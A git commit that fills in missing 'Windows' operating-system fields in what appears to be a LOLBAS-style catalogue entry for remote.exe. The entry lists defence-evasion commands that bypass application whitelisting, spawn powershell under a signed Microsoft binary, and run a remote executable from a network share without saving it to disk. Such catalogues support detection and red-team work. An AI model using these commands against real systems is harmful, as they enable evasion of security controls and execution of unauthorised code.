Adding missing OperatingSystem values.

This commit is contained in:
xenoscr 2022-09-11 00:22:36 -04:00
parent 68e5795aec
commit 6e253a7a38
No known key found for this signature in database
GPG Key ID: 52C26F96860C0DAA

View File

@ -10,21 +10,21 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1127
OperatingSystem:
OperatingSystem: Windows
- Command: Remote.exe /s "powershell.exe" anythinghere
Description: Spawns powershell as a child process of remote.exe
Usecase: Executes a process under a trusted Microsoft signed binary
Category: Execute
Privileges: User
MitreID: T1127
OperatingSystem:
OperatingSystem: Windows
- Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
Description: Run a remote file
Usecase: Executing a remote binary without saving file to disk
Category: Execute
Privileges: User
MitreID: T1127
OperatingSystem:
OperatingSystem: Windows
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe